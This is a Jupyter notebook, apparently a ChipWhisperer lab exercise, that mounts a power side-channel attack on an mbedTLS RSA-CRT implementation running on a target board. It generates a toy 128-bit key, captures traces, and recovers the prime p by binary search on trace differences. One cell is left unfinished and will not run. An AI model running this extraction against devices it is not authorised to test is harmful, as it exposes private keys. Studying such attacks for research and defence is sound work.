### Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'MBEDTLS'

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../../hardware/victims/firmware/simpleserial-rsa
#make clean PLATFORM=$1 CRYPTO_TARGET=$2
make PLATFORM=$1 CRYPTO_TARGET=$2 SS_VER=SS_VER_2_1

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = '../../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-mbedtls.hex'

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
import numpy as np
import time 
import matplotlib.pylab as plt
import matplotlib

In [ ]:
e = 65537
n = 89525655797379415138998373505682772229

### find numbers

In [ ]:
from sympy import nextprime

# Start with a random 31-byte number and search for a 32-byte prime
start_number = int('F' * 62, 16)  # A large number close to the 32-byte maximum
prime_32_byte = nextprime(start_number)

print(prime_32_byte)

In [ ]:
# generate 8 byte numbers and get next prime number
import random
from sympy import nextprime

#unsigned_8_byte = random.randint(0, 2**64 - 1)
unsigned_8_byte = 6353019252147394183;
print(unsigned_8_byte)



#print(rand)
prime1 = nextprime(unsigned_8_byte)
print("p1:", prime1)
print(prime1.to_bytes(8,'big'))

r = 14091828191315287468

prime2 = nextprime(r)
print('p2:', prime2)
print(prime2.to_bytes(8,'big'))

# p2 = 14091828191315287577


In [ ]:
# prime numbers with 8 bytes
#p1: 6353019252147394247
#p2: 14091828191315287507

#p>q



p = 14091828191315287507
pb = p.to_bytes(8,'big')
print('p', p, pb, hex(p))
q =6353019252147394247
qb = q.to_bytes(8,'big')
print('q', q, qb, hex(q))

N = p*q
#print(N) # 89525655797379415138998373505682772229
Nb = N.to_bytes(16,'big')
print('N', N, Nb, hex(N))

e = 65537
eb = e.to_bytes(32,'big')
print('e', e, eb, hex(e))

euler = (p-1)*(q-1)
print('euler', euler)
# 89525655797379415118553526062220090476


In [ ]:

#imversis zu e mod euler: e*d + k * euler = 1 = ggT(e, euler)
# www.ardt-brunner.de : 
# -11066227285572587116825642226986968475·65537 + 8101·89525655797379415118553526062220090476 = 1
d_ = -11066227285572587116825642226986968475

d = d_ + euler
print(d)
# 
db = d.to_bytes(16,'big')
print('d', d, db, hex(d))

#test
t = (d * e ) % euler
print(t)

dp = d % (p-1)
#print(dp)
#
dpb = dp.to_bytes(8,'big')
print('dp', dp, dpb, hex(dp))

dq = d % (q-1)
#print(dq)
#
dqb = dq.to_bytes(8,'big')
print('dq', dq, dqb, hex(dq))


qinv = pow(q, -1, p)
#print(qinv)
#
qinvb = qinv.to_bytes(8,'big')
print('qinv', qinv, qinvb, hex(qinv))

#test
t2 =(qinv * q) % p
print(t2)

In [ ]:
threshold = 
p = 14091828191315287507
q = 6353019252147394247


i = 0
while True:
    result = pow(i, e, n)
    if result < threshold:
        if (i % p) - (i % q) < 0:
            break
    i += 1


print(i)


In [ ]:
def find_i_values(p, q, count=10):
    i = 0  # Startwert
    results = []
    
    while len(results) < count:
        if (i % p) - (i % q) < 0:
            results.append(i)
        i += 1
    
    return results

# Parameter p und q
p = 14091828191315287507
q = 6353019252147394247


# Finde die ersten 10 Werte für i
i_values = find_i_values(p, q)
print(i_values)

### capture trace setup

In [ ]:
scope.clock.adc_src = "clkgen_x1"
#scope.adc.samples = 1000
scope.adc.samples = 200

scope.adc.timeout = 50

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    scope.arm()
    target.simpleserial_write('h', text)

    # get debug output
    rec_str = target.read(1000, timeout=2000)
    received_str = rec_str.replace("\\r\\n", "\n")
    print(received_str)
    
    #while(1) targete.read(), print //für x sekunden
    #t_end = time.time() + 3
    #while time.time() < t_end:
    #    print(target.read())
    
    ret = scope.capture()
    if ret:
        return None
    target.simpleserial_wait_ack()
    return scope.get_last_trace()

### test numbers for 2 Byte prim numbers

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 0
c = (msg ** e) % n

msg2_d1 = c.to_bytes(16,'big')

print(c, msg2_d1, type(msg2_d1))

trace2_d1 = capture_RSA_trace(scope, target, msg2_d1)
plt.figure()
plt.plot(trace2_d1, 'r')

In [ ]:
plt.close('all')

In [ ]:
matplotlib.pyplot.close()

### Key Reconstuction

* find plaintexts x_1 and x_2 mit diff(x_1) = 0 und diff(x_2) = 1.
* mittels binäre suche: finde x mit diff(x-1) = 0 und diff(x) = 1 -> x ist Vielfaches von p 
* ggt(x, n) = p
* x^e mod n

### Algorithmus

Reconstruction of p when its bitlength is half bitlength of n
INPUT: modulus n with the bitlength t, public exponent e.
OUTPUT: prime p such that p divides n.

t = bitlenght von n 
p,q haben bitlänge t/2

x = 2 ** (t/2)
m = x/2 

werte liegen bei 2 und bei 12 -> mitte  wählen bei mit debug 
werte liegen bei 2 und bei 11 -> mitte ist 7/6

In [ ]:
# 8Byte Primzahlen 

t = 128

# x= 2 ** (t/2) 
# m = x/2 
# l = 0 

x = 2**64
m = x//2
l = 0

print(x, m, l)

In [ ]:

 
plt.figure()

ref_trace_msg_ = 0 # loop wird nicht ausgeführt, diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(16,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    #enc = (m ** e) % n
    
    print(m, type(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(16,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print("{:1} diff = {:2}".format(m, diff))
    
    #check if diff(m) = 1
    #if (m % 62549) - (m % 61543) < 0:
    #sad = 5 for diff(x) = 1 und diff(y) = 0 für debug 1 -> diff < 3
    # no debug: diff < 10
    if diff < 8: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)
    

p = 14091828191315287507
q = 6353019252147394247
N = 89525655797379415138998373505682772229

q = N // p
euler = (p-1)*(q-1)

-> d durch erweiterter euklidischer algo 

In [ ]:
scope.dis()
target.dis()